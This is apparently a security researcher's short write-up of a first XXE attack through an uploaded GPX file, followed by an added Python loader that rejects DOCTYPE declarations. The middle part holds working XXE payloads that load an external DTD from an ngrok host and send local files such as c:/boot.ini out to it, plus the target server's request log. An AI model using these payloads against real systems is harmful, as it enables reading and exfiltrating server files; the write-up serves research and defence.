My first XML External Entity (XXE) attack with .gpx file

<gpx xmlns="http://www.topografix.com/GPX/1/1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xmlns:gpxtpx="http://www.garmin.com/xmlschemas/TrackPointExtension/v1" creator="Oregon 400t" version="1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 ">
  <metadata>
    <link href="http://www.garmin.com">
      <text>Garmin International</text>
    </link>
    <time>2009-10-17T22:58:43Z</time>
  </metadata>
  <trk>
    <name>Example GPX Document</name>
    <trkseg>
      <trkpt lat="47.644548" lon="-122.326897">
        <ele>4.46</ele>
        <time>2009-10-17T18:37:26Z</time>
      </trkpt>
    </trkseg>
  </trk>
</gpx>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "https://37*****f.ngrok.io/Desktop/xxe_file.dtd">
<foo>&attack;</foo>
<!ENTITY % d SYSTEM "file:///c:/boot.ini">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'https://37*****f.ngrok.io/%d;'>">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "https://37*****f.ngrok.io/Desktop/xxe_file.dtd">
<foo>&attack;</foo>
<!ENTITY % vuln1 SYSTEM "file:///">
<!ENTITY % vuln2 "<!ENTITY attack SYSTEM 'http://37*****f.ngrok.io/EXAMPLE?%vuln1;'>">
%vuln2;
GET /Desktop/xxe_file.dtd HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.7.0_15
Host: 37***cf.ngrok.io
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
X-Forwarded-For: 54.246.***.***
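
The request log above shows the server's Java XML parser fetching the external DTD named in the DOCTYPE. As an added defensive example (not code from the original post), here is a Python GPX loader that rejects any upload carrying a DOCTYPE before the tree is built, since a GPX track never needs one; the `attacker.invalid` host and both sample documents are constructed for the example.

```python
# Added defensive example, not from the original post: a GPX loader that refuses
# any upload carrying a DOCTYPE before the tree is built. Every payload above
# needs a DOCTYPE to pull in the external DTD, and a GPX track never needs one.
# The Java parser seen in the request log gets the same effect from the feature
# "http://apache.org/xml/features/disallow-doctype-decl" on its factory.
import xml.parsers.expat
import xml.etree.ElementTree as ET

GPX_NS = "{http://www.topografix.com/GPX/1/1}"

class UnsafeGpxError(ValueError):
    """Upload contains a DOCTYPE declaration."""

def reject_doctype(data: bytes) -> None:
    """Expat pre-scan that aborts on the first DOCTYPE. Expat never fetches an
    external DTD by itself, so this scan makes no network request."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeGpxError(f"DOCTYPE {name!r} (SYSTEM {sysid!r}) not allowed")
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # a handler exception propagates out of Parse()

def parse_gpx(data: bytes) -> list:
    """Return (lat, lon, ele) for every <trkpt>, after the DOCTYPE check."""
    reject_doctype(data)
    root = ET.fromstring(data)
    points = []
    for trkpt in root.iter(GPX_NS + "trkpt"):
        ele = trkpt.findtext(GPX_NS + "ele")
        points.append((float(trkpt.get("lat")), float(trkpt.get("lon")),
                       float(ele) if ele is not None else None))
    return points

def is_rejected(data: bytes) -> bool:
    """True when the loader refuses the upload for carrying a DOCTYPE."""
    try:
        parse_gpx(data)
    except UnsafeGpxError:
        return True
    return False

# Constructed samples: a benign track, and the DOCTYPE shape of the payloads
# above with a placeholder host (nothing is fetched either way).
BENIGN_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="test">
<trk><trkseg><trkpt lat="47.644548" lon="-122.326897"><ele>4.46</ele></trkpt></trkseg></trk>
</gpx>"""
HOSTILE_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://attacker.invalid/xxe_file.dtd">
<foo>&attack;</foo>"""
```

The same check also stops an internal-subset DOCTYPE (entity-expansion bombs), because the handler fires on the declaration itself rather than on what it references.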

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Valeriy Shevchenko
